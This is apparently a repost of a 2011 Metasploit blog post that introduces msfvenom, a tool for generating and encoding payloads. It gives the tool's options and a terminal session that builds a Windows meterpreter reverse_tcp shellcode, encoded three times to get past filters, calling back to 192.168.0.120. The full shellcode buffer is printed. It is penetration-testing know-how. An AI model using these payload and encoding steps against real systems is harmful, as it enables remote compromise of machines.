The Metasploit Framework has included the useful tools msfpayload and msfencode for quite sometime. These tools are extremely useful for generating payloads in various formats and encoding these payloads using various encoder modules. Now I would like to introduce a new tool which I have been working on for the past week, msfvenom. This tool combines all the functionality of msfpayload and msfencode in a single tool.
Merging these two tools into a single tool just made sense. It standardizes the command line options, speeds things up a bit by using a single framework instance, handles all possible output formats, and brings some sanity to payload generation.
The usage of msfvenom is fairly straight forward:
All these options are mappings of the msfpayload and msfencode options. Some minor things were changed to standardize things a bit. One change was the method of specifying the payload. The -p flag must be used to set the payload. The var=val pairs used to setup the datastore options for the payload still work the same way as msfpayload and can occur anywhere within the command line.
Here is an example of using the tool to encode a meterpreter/reverse_tcp payload:
The above example generates a meterpreter/reverse_tcp payload in the ruby output format. The payload is encoded three times using shikata_ga_nai which was automatically choosen based on the encoder modules ranking. The -s option specifies the output should not exceed 480 bytes. Finally the LHOST=192.168.0.120 portion of the command sets the LHOST variable for use with in the payload.
The following shows a quick speed comparison of the tools performing the same task:
We can see msfvenom is slightly faster due to the use of a single framework instance.
The tool is still in its infancy and I am sure there are still a few bugs, so don't hesitate to give me feedback. If you find a bug or have a feature idea feel free to make a redmine ticket on https://dev.metasploit.com. We will be shipping msfpayload and msfencode as a fallback until msfvenom has matured a little more.
fahrenheit:msf3 bannedit$ ./msfvenom -h Usage: ./msfvenom [options] <var=val> Options: -p, --payload [payload] Payload to use. Specify a '-' or stdin to use custom payloads -l, --list [module_type] List a module type example: payloads, encoders, nops, all -n, --nopsled [length] Prepend a nopsled of [length] size on to the payload -f, --format [format] Format to output results in: raw, ruby, rb, perl, pl, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war -e, --encoder [encoder] The encoder to use -a, --arch [architecture] The architecture to use --platform [platform] The platform of the payload -s, --space [length] The maximum size of the resulting payload -b, --bad-chars [list] The list of characters to avoid example: '\x00\xff' -i, --iterations [count] The number of times to encode the payload -x, --template [path] Specify a custom executable file to use as a template -k, --keep Preserve the template behavior and inject the payload as a new thread -h, --help Show this message
fahrenheit:msf3 bannedit$ msfvenom -p windows/meterpreter/reverse_tcp -f ruby -e -i 3 -s 480 LHOST=192.168.0.120 [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3) buf = "\xd9\xf7\xd9\x74\x24\xf4\xbb\x9c\xec\xea\x8a\x5f\x2b\xc9"+ "\xb1\x50\x31\x5f\x18\x03\x5f\x18\x83\xef\x60\x0e\x1f\x31"+ "\x11\xe0\xa4\x2a\xfb\x23\xfd\xc7\xdf\x2f\xa4\x16\xd6\x61"+ "\x10\x68\xb2\x95\x20\x60\xbe\x95\x7c\x65\x55\x40\x38\x01"+ "\x4b\x51\x78\x5f\x1f\x36\xde\x3b\x99\x8c\xb2\x11\xb3\x8d"+ "\x2d\x4c\x66\x7c\xbd\x02\x0b\xa6\xa9\x1a\x32\x65\xcf\x75"+ "\xe8\x15\x1a\x62\x5f\x69\xe1\xdd\x90\x2e\x2e\x40\xe0\xb7"+ "\x8b\x16\xfe\x15\xdc\x34\x4c\x4e\x18\x18\x03\x46\x22\xff"+ "\xa8\x9b\xf0\xd5\x4f\xe0\xfd\xab\x71\x6e\x43\x03\xd5\x28"+ "\x07\x29\x5e\xad\x8f\xd8\xaf\xbd\x69\x06\xf1\xd1\x4e\x9b"+ "\x01\x7d\x5a\x75\x54\x76\x90\xdb\x5e\x7b\x97\x37\xa4\xab"+ "\x2d\xe2\x17\x8e\xcf\x4b\xd0\x3f\xef\xc6\xff\xe5\x1c\xc3"+ "\x99\x04\x15\x2e\xce\x5e\x16\x86\x5a\x2f\x62\x0a\x32\xe5"+ "\xe1\xa4\xd3\x32\x92\x13\xfd\xcf\xb6\xa2\x8b\x97\xce\xf8"+ "\x27\x12\xb0\x6f\xb5\xa8\x91\x30\x2c\x14\x40\x2f\x43\xd8"+ "\x45\x46\xd0\x4c\x58\x59\x8d\x78\x47\xb2\xda\x79\x6c\xfa"+ "\x07\x43\x18\xc4\x07\x0e\x2f\xd0\x71\x84\xcb\x1c\xab\x01"+ "\xb0\x17\xed\x07\x1b\xb0\xcf\xd1\x25\xc1\x9b\x62\x7c\xac"+ "\x43\x2e\x52\x36\xb1\xfc\x61\xbc\x0e\x56\xdc\xe1\x9d\xc2"+ "\x29\x3f\xe9\xf3\xb1\xe2\x72\x77\x99\x4b\xf3\xfc\x83\xd2"+ "\x19\x6d\x53\x4c\x64\xa0\xdd\x38\x82\x3d\x15\x66\x38\x96"+ "\x39\xb3\xa4\xe3\xff\x07\xb7\x8a\x23\xca\xc6\xaf\x57\x64"+ "\x3d\xf3\x23\x63\x42\x30\x90\x3b\x67\x26\x81\x24\x61\xc3"+ "\xe4\x51\x75\x30\x47\xf8\x15\xcb\x21\xe9\x2a\x30\x9d\x04"+ "\x28\xe3\x37\xb0\xa4\xaa\x1e\xf3"
fahrenheit:msf3 bannedit$ time ./msfvenom -p windows/meterpreter/reverse_tcp -e -i 3 LHOST=192.168.0.120 -f ruby 1> /dev/null [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3) real 0m2.744s user 0m2.380s sys 0m0.367s fahrenheit:msf3 bannedit$ time ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.120 R|./msfencode -c 3 1> /dev/null [*] x86/shikata_ga_nai succeeded with size 321 (iteration=1) [*] x86/shikata_ga_nai succeeded with size 348 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 375 (iteration=3) real 0m3.070s user 0m4.227s sys 0m0.778s
bannedit@metasploit.com 25 May, 2011
--
Source: https://community.rapid7.com/community/metasploit/blog/2011/05/24/introducing-msfvenom
~
0 komentar:
Posting Komentar
Ayo gan Komentarnya jangan lupa,,,biar tambah semangat yang upload Film dan Game dan berita juga update artikelnya, kalau ada link yang mati laporkan juga disini ya...